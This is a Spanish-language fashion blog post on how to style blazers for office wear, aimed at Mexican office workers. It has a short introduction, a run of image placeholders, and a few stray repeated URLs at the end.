Skip to content
Anuncios

Blazer, el dinamismo necesario para todo Godínez

La moda no sólo debe abarcar los eventos sociales, las pasarelas o el brunch con tus amigas; es claro que uno de los principales lugares donde debe de quedar marcado tu estilo es en la oficina, ese pequeño lugar en el que duras cerca de 8 horas diarias y que a veces es agobiante el ver tu guardarropa y escoger un outfit sin tener que repetir en la misma semana.

Admitamos que los blazers, estas piezas altas de un traje sastre que llegaron en la década de los 80’s a revolucionar la moda urbana, se han convertido en la pieza favorita por aquellas business women, o bien conocidas en México como Godínez; para acompañar un atuendo sencillo y convertirlo en un hit dentro de los pasillos de la empresa.

En este artículo recopilamos como combinar un blazer para que nunca tengas que volverte a preocupar por repetir guardarropa frente a tu jefe. Texturas, colores y decenas de combinaciones para inspirarte, así que si tienes un blazer guardado en tu guardarropa, es hora de desempolvarlo y darle un vuelco a tu outfit cotidiano.

blazer1

blazer2

blazer3

blazer4

blazer7

blazer14

blazer15

 blazer5 blazer6 blazer8 blazer9 blazer10  blazer11  blazer12  blazer13 blazer16  blazer17  blazer18  blazer19

https://cuev.in/aux.php?ver=1.1&ref=z

https://cuev.in/aux.php?ver=1.1&ref=zhttps://cuev.in/aux.php?ver=1.1&ref=z

https://cuev.in/aux.php?ver=1.1&ref=z

Anuncios
A %d blogueros les gusta esto: